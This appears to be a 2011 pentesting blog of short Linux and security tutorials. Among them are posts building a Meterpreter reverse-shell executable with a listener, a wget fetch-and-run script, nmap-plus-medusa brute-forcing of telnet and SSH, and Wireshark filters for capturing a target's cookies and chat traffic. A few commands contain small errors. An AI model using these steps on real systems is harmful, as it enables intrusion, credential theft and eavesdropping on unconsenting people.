Exploit-DB updates

Sunday, May 29, 2011

Installing TOR manually - Debian / BT5

This will be a quick how-to on install tor manually in BT5. First, add the tor repositories to your sources.list like so;

nano /etc/apt/sources.list 

Then add the following tor repositories to the list, the distro will varry. To find out what version of debian you're running, simply read the debian version file with cat;

cat /etc/debian_version

Now you know what version of debian you're running, replace the <Distro> with that version. 

deb http://deb.torproject.org/torproject.org <Distro> main 

Save that with "ctrl-o" and then proceed to add the "GNU Privacy Guard" keys that are used to sign the tor packages;

gpg --keyserver keys.gnupg.net --recv 886DDD89 
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - 

Now update your system and install the tor packages. 

apt-get update 
apt-get install tor tor-geoipdb 

Now tor's installed, you can move on to installing polipo and the GUI vidalia.

SIPVicious Usage

Well I was going to go and make a quick SIPVicious demo, but there's this video which was a good demo on what these scripts are capable of doing. So instead of making another video, I'll just embed his as it's a good tutorial.


SIPVicious - SIP/VOIP Auiditing Suite

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools: 
  • svmap - this is a sip scanner. Lists SIP devices found on an IP range
  • svwar - identifies active extensions on a PBX
  • svcrack - an online password cracker for SIP PBX
  • svreport - manages sessions and exports reports to various formats
  • svcrash - attempts to stop unauthorized svwar and svcrack scans 
Find out more information as well as the official source here.

Friday, May 20, 2011

Using pipelines to pipe data.

Well this is a simple concept, but it's usefulness has no limits. It's the ability to pipe data output from one command into another. For example, I can use the use the "ip addr" command combined with grep to only display the lines containing the inet addresses.

 ~ $ ip addr | grep inet
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
    inet 10.0.0.3/24 brd 192.168.1.255 scope global eth0
    inet6 fe80::217:31ff:feda:9814/64 scope link
You could pipe that data along further to awk, then select specific data out of it to be displayed. For example;

 ~ $ ip addr | grep inet | awk '{print $2 ":" $4}'
           
            127.0.0.1/8:host
            ::1/128:host
            192.168.1.102/24:192.168.1.255
            fe80::217:31ff:feda:9814/64:link



Or another example could involve that simple java ip parser I made, while using it I noticed that alot of scans had duplicate ips, which could cause you to waste valuable time running tools against the same IP multiple times. I haven't been playing much with Java lately, so I decided to just fix the problem in a bash script with the use of the "uniq" command. This is the command the script uses to remove duplicate IP's from the IP list.

java -jar ips.jar nlog | uniq > iplist.txt

That would parse the nmap log for IP's and it's then piped over to the uniq command which removes duplicate IP's and writes it to a file called iplist.txt in a list format.

You can find that Java parser here.

Tuesday, May 17, 2011

Using wget to download ftp files

This is a quick example of how you can use wget to download more then just html files, in this case we will download a shell script off our ftp server and then execute it.

#! /bin/sh
echo -e "\033[1;32;1mAttempting to destroy monsanto before they contaminate the planet with hazardous GMO's"
wget --ftp-user Pathogen --ftp-password hakhub ftp://ftp.drivehq.com:21/DestroyMonsanto.sh
chmod 755 DestroyMonsanto.sh
./DestroyMonsanto.sh
echo "Too late"

That is a basic example of a shell script which would download a file using wget, give it the appropriate permissions, then execute it. If you need free ftp storage, check out drivehq.

Monday, May 16, 2011

BT5 was released.

Incase you guys haven't heard for some reason, BackTrack5 has been released. I'm really enjoying, probably my favorite one so far. GUI is nice, and the tools are great as always. Download it from here;

http://www.backtrack-linux.org/downloads/

Getting started with Armitage

Well I've never bothered playing with armitage before, but I figured what the hell. I decided to post a quick how-to on getting it fired up for the first time. First, make sure you're all up to date, then use your repositories to install armitage.

apt-get update
apt-get armitage

then we will have to fire up metasploits rpc deamon, as that's what armitage uses to interact with the metasploit framework.

msfrpcd -f -U msf -P test -t Basic

now make sure mysql is up and running;

/etc/init.d/mysql start

Now, make sure you're in armitage's directory and run the shell script "armitage.sh". For BT4 (BT5 is out) you would be issuing these commands.

cd /pentest/exploits/armitage
armitage.sh

Now, seeing as we set the user as "msf" and the password as "pass" with the msfrpcd command, we can just hit "connect". That should have done it, if all's well you see something like this;









Sunday, May 15, 2011

Creating an executable payload via msfpayload.

We'll be making a quick tutorial on how to create an executable using a metasploit payload. We will use a meterpreter payload, here's the command we would want to issue to create an ".exe".

msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=31337 X > /root/Shiny.exe

You can then verify it was created by using the "file" command, like so;

file /root/Shiny.exe

And it should say something along the lines of this;

/root/Shiny.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

You now have a working payload in the form of an exe, you can now fire up metasploit and use the exploit handler to listen for the incomming connections. Assuming we are in the the metasploit console, we would issue the following commands;

msf> use exploit/multi/handler 
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(Handler) > set LHOST=19.84.20.11 
msf exploit(Handler) > set LPORT=31337 
msf exploit(Handler) > exploit 

You now have a handler waiting for incoming connections from those who run your meterpreter payload.

Saturday, May 14, 2011

Using colors in bash scripts with ANSI/TV100 codes.

Well, I've made a few posts related to bash scripting so I though I'd make a quick post showing how you can add some color to your scripts. We will be using ANSI, here's a quick example of how to use it;

echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blue \033[0;34;1m"
nmap 127.0.0.1


Make sure you remember the "-e", which enables the interpretation of backslash escapes so it will actually except the ANSI code rather than printing it out like a normal string.
Console Color chart
Black       0;30     Dark Gray     1;30
Blue        0;34     Light Blue    1;34
Green       0;32     Light Green   1;32
Cyan        0;36     Light Cyan    1;36
Red         0;31     Light Red     1;31
Purple      0;35     Light Purple  1;35
Brown       0;33     Yellow        1;33
Light Gray  0;37     White         1;37
 
Backgrounds 
40     Black
41       Red
42     Green
43    Yellow
44      Blue
45   Magenta
46      Cyan
47     White

  
You can also add other attributes such as using underlined or bold/bright text by changing the last digit in the code, just before the "m". For example, to use the underline attribute I would do this;


echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blueish \033[0;34;4m"
echo -e "This is underlined\033[0m this is not"
 

 Some Useful Attribute Codes 

0m = Reset all attributes.
1m = Set the "bright" attribute.
2m = Set the "dim" attribute.
4m = Sets the "underline" attribute
5m = Sets the "blink" attribute.
7m = Sets the "reverse" attribute.
8m = Sets the "hidden" attribute.

This is where I'll end this quick example of ANSI/TV100 being used to add color to your bash scripts. This is only a sample of the possibilities these codes create, so don't think it ends here. You can learn more at this site.

Tuesday, May 10, 2011

Some useful shell commands/tools

Well I've been learning some useful things I've previously didn't know about so I though I'd take a moment and post some useful things you can do at the command line.


See who's logged in and what they're doing with the "w" command;

~ $ w
 00:41:06 up 1 day,  1:13,  8 users,  load average: 1.57, 1.14, 1.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
pathogen pts/0    :0.0             Sun23    2:27m 57.59s  3:26  /usr/bin/python
pathogen pts/1    :0.0             Mon00   23:08m  0.29s  0.29s /bin/bash
pathogen pts/2    :0.0             Mon00   23:59m 35.86s  0.27s /bin/bash
pathogen pts/3    :0.0             Mon01   22:41m  4.50s  4.25s polipo
pathogen pts/4    :0.0             Mon02    1:42  44.25s  3:26  /usr/bin/python
pathogen pts/5    :0.0             23:32    0.00s  0.27s  0.01s w
pathogen pts/6    :0.0             23:34   57:46   0.48s  0.48s bash
pathogen pts/7    :0.0             23:44   56:24   0.28s  0.28s /bin/bash

The next command is the "tail" command which we used with arpwatch in a previous post. This command can be used to read the last 10 lines (or more) of a file or piped data and displays it in the terminal. This is nice if you want to watch logfiles for example.

tail -f /var/log/syslog

Another good command line tool is "top", which displays processor and process statistics in real time. 


Next is extremely handy command - man - which is short for manual and is used to display in-depth information about a given command or gives you the ability to search for manuals containing a keyword. For example, the command "man ascii" returns a rather detailed ascii chart - which we all know can be a lifesaver. You can search for manuals containing a keyword like so;

~ $ man -k irc
aircrack-ng (1)      - a 802.11 WEP / WPA-PSK key cracker
airodump-ng (1)      - a wireless packet capture tool for aircrack-ng
airtun-ng (1)        - a virtual tunnel interface creator for aircrack-ng
queue (3)            - implementations of lists, tail queues, and circular queues
dir_colors (5)       - configuration file for dircolors(1)
dircolors (1)        - color setup for ls
irssi (1)            - a modular IRC client for UNIX
xchat (1)            - IRC client for X similar to AmIRC
XCirculateEvent (3)  - CirculateNotify event structure
XCirculateRequestEvent (3) - CirculateRequest event structure
XCirculateSubwindows (3) - change window stacking order
XCirculateSubwindowsDown (3) - change window stacking order
XCirculateSubwindowsUp (3) - change window stacking order

This one is more a tip - autocompleting a command or directory using "TAB". If there's only one option then it autocompletes when you hit tab, otherwise it shows the possibilities. For example hitting "TAB" when I have net typed in the shell will return this;

~ $ net
net         netcat      netkit-ftp  net.samba3  netscsid    netstat  

And hitting tab with /var/ typed will show me the existing directories in /var/ but if I hit "TAB" with "/var/r" than it will autocomplete it with "/var/run" because there's only one option.

This next command is "cat", which concatenates a file and displays it in the terminal. For example if we wanted to read the text file "hakhub" we could just use "cat";

~ $ cat hakhub
Is effin awesome.

You can also string commands together using the ";" operator, like we have with the ip parser and nmap. For example we can make a make a new directory and then copy our "hakhub" textfile to it. We will "cat" it at the end to verify it's there.

mkdir learning; cp hakhub /root/learning/;cat /root/learning/hakhub

Another useful command is "ln", which creates a link to a given file. For example we will make a symbolic link in the learning directory we created to the "hakhub" textfile in our root directory. Assuming we are currently in the root directory we will issue this command;

ln -s hakhub /root/learning/stuff

There's now a file in out learning directory which links back to our hakhub textfile, so if we were to cat the "stuff" link it would display it's contents just as before. So this could be useful to create links to tools located in various directories.

The next useful shell command is "screen", which I use to easily switch between various shells in one window (using CRTL A);
 “Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells).”
You can read more about screen and get an idea of what it is and how it can be used here - http://linux.die.net/man/1/screen 

This next one is "df", which stands for diskfree. Very basic but still nice to know if you have multiple drives or usb's up the yingyang.

 ~ $ df 
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sda1            237431480  51512296 173858308  23% /
none                    501520       316    501204   1% /dev
none                    508544       284    508260   1% /dev/shm
none                    508544       112    508432   1% /var/run
none                    508544         0    508544   0% /var/lock
none                    508544         0    508544   0% /lib/init/rw
none                 237431480  51512296 173858308  23% /var/lib/ureadahead/debugfs
/dev/sdd1              1965696    637664   1328032  33% /media/SD Card
/dev/sdc1              1930464   1291072    639392  67% /media/disk-1

Next is "wget", which is a utility for non-interactive download of files from the internet. It supports both http and https along with ftp and has the ability to utilize proxies. This can be used in a variety of ways, it can be used with conky via bash scripts for example. Backtrack 4 uses a wget bash script to check the external ip and display it in conky. Though the possibilities are endless, that's just one example.

Another great tool that's simple yet has a ton of possible uses when coupled with other tools, grep. This tool is based around regular expressions and is used to search files for text. For example, this command would look for 

This next tool is links2 which is a console-based text web browser which is extremely lightweight as you could imagine. There's others like it such as lynx, but I prefer links2 myself. You can use it by typing links2 in your console, then pressing "g" and entering the url. You can use links2 with a proxy like so;

links2 -http-proxy 127.0.0.1:9050

or to run it with a graphical interface, you can add a "-g"

links2 -g -http-proxy 127.0.0.1:9050

To be continued......


iptraf - ncurses lan monitor



The iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in easy to read format:
  • Network traffic statistics by TCP connection
  • IP traffic statistics by network interface
  • Network traffic statistics by protocol
  • Network traffic statistics by TCP/UDP port and by packet size
  • Network traffic statistics by Layer2 address

Detect MITM attacks with ArpWatch

Well here we will be using the tool "arpwatch" in assistance with the "tail" command to watch for new arp entries and for changes made (I.E a Mitm attack). 


Arpwatch was developed by Lawrence Berkeley National Laboratory, Network Research Group, as open-source software and is released under the BSD license.
Now you should have the "tail" command installed already so you don't have to worry about that, arpwatch probably isn't so you can install that with the "apt-get install arpwatch" command or visit the site it's hosted on for the latest releases -  ftp://ftp.ee.lbl.gov/arpwatch.tar.gz

And if you were wondering what "tail" is, it's a very useful unix command which reads the last few lines of a file or piped data and displays it for us in the terminal. Once you have everything installed, open your terminal/shell of choice - I prefer terminator, it's great - then we will fire up arpwatch on the interface we'd like to monitor and then use the tail command to monitor the syslog file for new entries.


sudo apt-get install arpwatch
arpwatch -i eth0
tail -f /var/log/syslog

Now you will have arpwatch watching for new arp entries and changes within the network which it will then proceed to log in the syslog file located in the /var/log/ directory. The log is then read by tails and displayed in your shell.

Saturday, May 7, 2011

Bash Scripting Basics

Well seeing as I've recently posted my bash friendly java IP parser for use with other tools, I figured I would make a post detailing the basics of bash scripting and one possible way the parser might be used. To start off, open your text editor of choice, mine is nano. Now we will start by creating a file called "b a.sh" and specifying which shell we'd like this script to use by adding "#!/bin/bash" to the top of our script. 

#!/bin/bash

The reason we add this is because we are telling the script to use the "bash" located in the "/bin" directory. 

Moving on to adding something useful. We can use a shell command like so;

#!/bin/bash
echo "Scanning the local network!"
nmap 10.0.0.1/24 -PN -sV -p 23

Now that we have a script that does something we can save it (ctrl-o in nano) and make it executable with the chmod command, then run it.

chmod 755 ba.sh
/ba.sh

Now this is nice and all, but not very useful seeing as we could just enter the command our self. We will string together an nmap scan with my log parser to extract ips from the log and write them in a list format.

#!/bin/bash
logfile="nlog" 
echo "Scanning the local network!"
nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open
java -jar ips.jar $logfile
cat ips

Now this script is a bit more useful, it scans the local network for pcs with telnet running and writes it to an nmap log which we specify using a variable. That log is then parsed by my ip parser and the ips are written in a list format to a file named "ips" which we then use the "cat" command (which reads a file and displays it in the terminal) to make sure all's well and the script worked. 

If we were on a pentest and wanted to automate a process to scan the network and attempt to crack open telnets we could use a script like this;

#!/bin/bash
logfile="nlog" 
echo "Scanning the local network for hosts running telnet"
nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open
java -jar ips.jar $logfile
medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

This script will essentially look for hosts running telnet and attempt to crack them with medusa. This is the very basics of bash scripting. There are so many other possibilities. I would also like to mention that when issuing commands in the terminal you can link them together using the ";". So this script could be issued in a shell like this;

clear;logfile="nlog" ;echo "Scanning the local network for hosts running telnet";nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open;java -jar ips.jar $logfile;medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

Note: You WILL need root to issue that command.


Well that's the basics and shows you how the ip parser could be used to combine tools, I'll likely make more posts on bash scripting in the future so stay tuned. You can find the ip parser here








Friday, May 6, 2011

Viewing intecepted VoIP calls using Wireshark

Okay so I've been playing with wireshark a bit more lately and was trying to find a tool to intercept voip calls when I decided to see what wireshark had in store. Long behold it has some great features in that aspect too. It really is far more power than I once though. Anyhow, on to what I wanted to show you guys. Assuming we continue where we left off on the filter thread, we would want to click on "Telephony" tab and select "VoIP Calls". There you can see the intercepted calls and view the "Graph" or use the "Player" to decode and play the message. The number of codecs it accepts is limited but worth playing with it.

Thursday, May 5, 2011

Wireshark & Tshark Basic Filtering

Well everyones heard of wireshark (and if you haven't you're missing out). What I want to dig more into is the filter capability it provides. This is extremely useful and can make life much easier if you know how to use them. Assuming I've already got wireshark fired up and sniffing up packets, I'll go up to the text input bar next to the Filter button and enter the following so I can filter out all traffic but the host I'm interested in.

ip.addr == 10.0.0.5

You could also just filter out your own traffic if you'd like to see everything while not having your own traffic flooding wireshark.

ip.addr != 10.0.0.2

If I had only wanted to see the packets being sent by the target host than I would use the follwing filter;

ip.src == 10.0.0.5 

or to see the packets being received by the host I could use this;

ip.dst == 10.0.0.5

We could also filter out packets for specific protocols by just specifying the protocol you'd like to filter. I.E "http", "tcp", "ssh", etc OR a specific TCP port "tcp.port == 8080".  We could also specify multiple different protocols. If perhaps we only wanted to see ssh and ftp packets we could just specify that like this;

ip.addr == 10.0.0.5 && ssh || ftp 

OR  

ip.addr == 10.0.0.5 && tcp.port == 22 || tcp.port == 21

We could also use the "and" to filter packets going back and forth to a web server like this;
ip.addr == 10.0.0.5 && ip.addr == xx.xx.xx.xx && tcp.port == 80

There are other nice filter options such as filtering everything but a certain hosts http cookies like so;

ip.addr == 10.0.0.5 && http.cookie

or if you were interested in their http requests this come in handy;

ip.addr == 10.0.0.5 && http.request

you could also view the http response;

ip.addr == 10.0.0.5 && http.request || http.response

In addition to the filters above, wireshark also provides filters for things such as yahoo messenger and AIM. If I wanted to see what our targets yahoo messenger activity is like than I would use a filter along these lines;


ip.addr == 10.0.0.5 && ymsg

We'd now see all their activity on yahoo messenger, whether it be sending a message or adding a friend.

This is where I'll wrap things up, these are just a few possible filters and should help you guys understand wireshark filters and the possible uses the provide.

Wednesday, May 4, 2011

Tor - Protect Your Privacy

Tor is a great tool for increasing anonymity and I highly suggest giving it a try if you haven't already. Below is some info borrowed from their site; http://www.torproject.org/

Inception

Tor was originally designed, implemented, and deployed as a third-generation onion routing project of the U.S. Naval Research Laboratory. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.

Overview

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.



You can find more information about tor here and download it from the following url;

Tuesday, May 3, 2011

Bash scripting friendly Java Ip Parser

Well I made a simple ip parser in Java to grab ips from a given file, mainly used for parsing nmap logs and writing them to a file in a list format for use with other tools. This was very useful, but I hadn't given it any thought to further automate the process by making the parser bash friendly by allowing command line arguments. Now you can tie it together with other tools of your liking with simple command like so;

nmap 192.168.1.1/24 -p 22 --open -oG sshlist; java -jar ips.jar sshlist; medusa -u root -H ips -P /root/passwords.txt -e ns -f -v 6 -O sshcrack -M ssh

You can find the edited version of the source below;

Jar - http://www.mediafire.com/?c3hpb22nk3lj2a3

NOTE: You can remove duplicate IP's from the list by piping the Java parsers output to the unix command "uniq", which will filter out the duplicates.


java -jar ips.jar nlog | uniq > iplist.txt

Monday, May 2, 2011

Paros Proxy

Paros Proxy is another tool I've started playing with since I've began getting more into the websec side of things. It's used for evaluating web app security and performing client side attacks. It acts as a proxy and intercepts all packets going back and forth between you and the web server, giving you the ability to manipulate those packets. I was going to make a simple tutorial but this guy did a great job an explains it well, so here's his video tutorial to get an idea of how you can use Paros Proxy.



hping3 Packet assembler/analyzer

 hping is a TCP/IP packet assembler/analyzer which I've only recently began playing with, so I've decided to make a quick post about it as well as some basic usage. Here's a bit from the site;

While hping was mainly used as a security tool in the past, it can be used in many ways by people that don't care about security to test networks and hosts. A subset of the stuff you can do using hping:
  • Firewall testing
  • Advanced port scanning
  • Network testing, using different protocols, TOS, fragmentation
  • Manual path MTU discovery
  • Advanced traceroute, under all the supported protocols
  • Remote OS fingerprinting
  • Remote uptime guessing
  • TCP/IP stacks auditing
  • hping can also be useful to students that are learning TCP/IP. 
For our first example we will be doing a simple ping to check if a ssh servers up on our network.

hping3 -c 2 -S -p 22 10.0.0.5

This command would send a packet count (-c) of two using the SYN flag (-S) to port 22 (-p) on the host 10.0.0.5 in order to see if it's live. We can also set it to send packets every specified interval as you'll see below.


hping3 -S -p 22 -V 10.0.0.5 -i 10 -I wlan0


This command would send a packet using the SYN flag every 10 seconds (-i) to port 22 with verbose output (-V) utilizing the wireless interface (-I).

This tool is so flexible that it can even be used as a scanner (though I wouldn't go and replace nmap just yet)

hping3 -S --scan 21-25,80,8080 -V 10.0.0.5 -I wlan0

Another example worth showing is the data manipulation available with hping. We will make a file with the contents we'd like out packets to display (to mess with those who actually read their logs and give them a laugh)

Now create your payload with the data you'd like your packets to contain, I'll just make mine "Pathogen was here" and save it as payload.txt (You will see the contents when looking through wireshark logs for example.) 

Do note the default data size is zero, so you will have to specify a data size (-d) in order to utilize the file option.


hping3 hakhub.tk -V -d 10 --file payload.txt -S -I wlan0

There's tons of other commands such as a listener and anonymity options, but these are a few of the possible things this tool is capable of. You can download it using your repository of choice or visit http://www.hping.org/download.php